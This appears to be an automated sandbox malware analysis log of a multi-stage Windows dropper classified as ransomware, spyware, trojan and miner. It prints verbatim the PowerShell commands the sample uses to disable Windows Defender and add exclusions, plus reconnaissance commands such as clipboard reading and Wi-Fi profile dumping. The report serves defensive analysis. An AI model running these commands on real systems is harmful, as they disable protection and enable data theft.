                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB76EF008_2_00007FFDFB76EF00
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB751B228_2_00007FFDFB751B22
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB832EB08_2_00007FFDFB832EB0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB754D048_2_00007FFDFB754D04
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB755B0F8_2_00007FFDFB755B0F
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB755DA38_2_00007FFDFB755DA3
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB7534868_2_00007FFDFB753486
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB8863108_2_00007FFDFB886310
                                  Source: Joe Sandbox ViewDropped File: C:\Program Files\Google\Chrome\updater.exe BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
                                  Source: Joe Sandbox ViewDropped File: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe 9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
                                  Source: Joe Sandbox ViewDropped File: C:\Program Files\Mozilla Firefox\dwm.exe 9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: String function: 00007FFDFB6FD7E5 appears 101 times
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: String function: 00007FFDFB75483B appears 50 times
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: String function: 00007FF7D1542760 appears 36 times
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: String function: 00007FFDFB752A04 appears 34 times
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: String function: 00007FFDFB75300D appears 50 times
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: String function: 00007FFDFB751EF1 appears 553 times
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: String function: 00007FFDFB6FD74F appears 214 times
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: String function: 00007FFDFB6912EE appears 562 times
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: String function: 00007FFDFB754057 appears 334 times
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: String function: 00007FFDFB7524B9 appears 44 times
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: String function: 00007FFDFB752734 appears 234 times
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: String function: 00007FF7D15425F0 appears 100 times
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: String function: 00007FF692972B30 appears 47 times
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: String function: 00007FF7691A25F0 appears 100 times
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: String function: 00007FF7691A2760 appears 36 times
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: String function: 00941590 appears 57 times
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: String function: 00941D60 appears 31 times
                                  Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                                  Source: unicodedata.pyd.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                                  Source: rar.exe.6.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                                  Source: unicodedata.pyd.6.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                                  Source: wxyubnjmnlae.tmp.13.drStatic PE information: Resource name: DLL type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                  Source: setup.exe.11.drStatic PE information: Number of sections : 11 > 10
                                  Source: updater.exe.13.drStatic PE information: Number of sections : 11 > 10
                                  Source: VaTlw2kNGc.exe, 00000000.00000003.1703132629.0000027991A30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs VaTlw2kNGc.exe
                                  Source: VaTlw2kNGc.exe, 00000000.00000003.1701573415.0000027991A30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs VaTlw2kNGc.exe
                                  Source: VaTlw2kNGc.exe, 00000000.00000003.1701344521.0000027991A30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs VaTlw2kNGc.exe
                                  Source: VaTlw2kNGc.exe, 00000000.00000003.1703039759.0000027991A30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs VaTlw2kNGc.exe
                                  Source: VaTlw2kNGc.exe, 00000000.00000003.1701653066.0000027991A30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs VaTlw2kNGc.exe
                                  Source: VaTlw2kNGc.exe, 00000000.00000003.1701766609.0000027991A30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs VaTlw2kNGc.exe
                                  Source: VaTlw2kNGc.exe, 00000000.00000003.1701443369.0000027991A30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs VaTlw2kNGc.exe
                                  Source: VaTlw2kNGc.exe, 00000000.00000003.1701216930.0000027991A30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs VaTlw2kNGc.exe
                                  Source: VaTlw2kNGc.exeBinary or memory string: OriginalFilename vs VaTlw2kNGc.exe
                                  Source: VaTlw2kNGc.exe, 00000001.00000003.1713406098.000001A21EE93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs VaTlw2kNGc.exe
                                  Source: VaTlw2kNGc.exe, 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs VaTlw2kNGc.exe
                                  Source: VaTlw2kNGc.exe, 00000001.00000002.1717293755.000001A21EE98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs VaTlw2kNGc.exe
                                  Source: VaTlw2kNGc.exe, 00000001.00000003.1716566464.000001A21EE96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs VaTlw2kNGc.exe
                                  Source: libcrypto-1_1.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.998771639088251
                                  Source: python310.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.99934387748315
                                  Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9943230597527473
                                  Source: libcrypto-1_1.dll.6.drStatic PE information: Section: UPX1 ZLIB complexity 0.998771639088251
                                  Source: libssl-1_1.dll.6.drStatic PE information: Section: UPX1 ZLIB complexity 0.9903694614553314
                                  Source: python310.dll.6.drStatic PE information: Section: UPX1 ZLIB complexity 0.99934387748315
                                  Source: sqlite3.dll.6.drStatic PE information: Section: UPX1 ZLIB complexity 0.9978469358079526
                                  Source: unicodedata.pyd.6.drStatic PE information: Section: UPX1 ZLIB complexity 0.9943230597527473
                                  Source: setup.exe, 0000000D.00000000.1760478396.00007FF690C49000.00000008.00000001.01000000.0000001F.sdmpBinary or memory string: .SlnIX
                                  Source: classification engineClassification label: mal100.rans.spre.troj.spyw.expl.evad.mine.winEXE@163/125@3/3
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691A29E0 GetLastError,FormatMessageW,MessageBoxW,0_2_00007FF7691A29E0
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_0093C652 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,4_2_0093C652
                                  Source: C:\ProgramData\setup.exeFile created: C:\Program Files\Google\Chrome\updater.exe
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\PbqyFjSG.log
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8792:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8084:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8268:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5840:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7868:120:WilError_03
                                  Source: C:\ProgramData\Microsoft\based.exeMutant created: \Sessions\1\BaseNamedObjects\J
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2496:120:WilError_03
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeMutant created: \Sessions\1\BaseNamedObjects\Local\3e64fe795a96f6df9d1018608996331101f86f90de28dc67ad34401869b49857
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7320:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9196:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8196:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8020:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7280:120:WilError_03
                                  Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exeMutant created: NULL
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7196:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9004:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9124:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8776:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69202Jump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCommand line argument: sfxname4_2_0094037C
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCommand line argument: sfxstime4_2_0094037C
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCommand line argument: STARTDLG4_2_0094037C
                                  Source: VaTlw2kNGc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeFile read: C:\Windows\win.iniJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: based.exe, 00000008.00000002.2587870470.00007FFDFF191000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                                  Source: based.exe, 00000008.00000002.2587870470.00007FFDFF191000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                                  Source: based.exe, 00000008.00000002.2587870470.00007FFDFF191000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                                  Source: based.exe, 00000008.00000002.2587870470.00007FFDFF191000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                                  Source: based.exe, 00000008.00000002.2587870470.00007FFDFF191000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                                  Source: based.exe, 00000008.00000002.2587870470.00007FFDFF191000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                                  Source: based.exe, 00000008.00000003.1909840733.00000273EDA74000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1908636737.00000273EDA6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                  Source: based.exe, 00000008.00000002.2587870470.00007FFDFF191000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                                  Source: VaTlw2kNGc.exeReversingLabs: Detection: 47%
                                  Source: based.exeString found in binary or memory: can't send non-None value to a just-started generator
                                  Source: based.exeString found in binary or memory: --help
                                  Source: based.exeString found in binary or memory: --help
                                  Source: based.exeString found in binary or memory: id-cmc-addExtensions
                                  Source: based.exeString found in binary or memory: set-addPolicy
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeFile read: C:\Users\user\Desktop\VaTlw2kNGc.exeJump to behavior
                                  Source: unknownProcess created: C:\Users\user\Desktop\VaTlw2kNGc.exe "C:\Users\user\Desktop\VaTlw2kNGc.exe"
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeProcess created: C:\Users\user\Desktop\VaTlw2kNGc.exe "C:\Users\user\Desktop\VaTlw2kNGc.exe"
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe -pbeznogym
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe -pbeznogym
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeProcess created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeProcess created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
                                  Source: C:\ProgramData\Microsoft\hacn.exeProcess created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
                                  Source: C:\ProgramData\Microsoft\hacn.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe -pbeznogym
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe -pbeznogym
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeProcess created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeProcess created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr'"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\ProgramData\svchost.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr'
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
